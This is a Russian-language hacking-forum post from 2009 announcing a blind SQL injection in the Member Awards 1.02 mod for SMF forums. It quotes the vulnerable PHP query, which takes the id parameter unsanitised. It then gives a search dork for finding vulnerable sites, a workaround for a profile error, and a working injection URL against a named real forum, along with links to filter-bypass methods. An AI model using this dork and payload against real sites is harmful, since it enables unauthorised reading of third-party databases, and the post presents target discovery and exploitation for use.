
13.06.2009, 17:53
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Member Awards 1.02 Blind SQL-Injection
Blind SQL-Инъекция в моде Member Awards Автор: mailbrush
Часть уязвимого кода (ManageAwards.php):
PHP код:
// Load single award ifo for editing.
$request = db_query("
SELECT ID_AWARD, awardName, gameName, timeAdded, filename, width, height
FROM {$db_prefix}awards
WHERE ID_AWARD = $_REQUEST[id]
LIMIT 1", __FILE__, __LINE__);
Уязвимость позволяет удаленному пользователю выполнить произвольные запросы в базу. Уязвимость существует в передаваемом параметре id.
Дорк:
Код:
inurl:index.php?action=profile;sa=awardsMembers;id=1
На многих найденных форумах, вместо награды будет сообщение
The user whose profile you are trying to view does not exist.
Оно возникает потому что удалённый пользователь не выбрал пользователя для просмотра, что есть обязаным для SMF. Решается это простоым добавлением id любого пользователя -
Код:
http://evilsite.com/smf/index.php?action=profile;sa=awardsMembers;u=1;id=1
Пример:
Код:
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1+and+substring(version(),1)=5
Способ обхода фильтра и эксплуатации уязвимости:
https://forum.antichat.ru/showpost.p...postcount=7592
https://forum.antichat.ru/threadnav46016-759-10.html
Последний раз редактировалось Grey; 14.06.2009 в 18:28..
|
|
|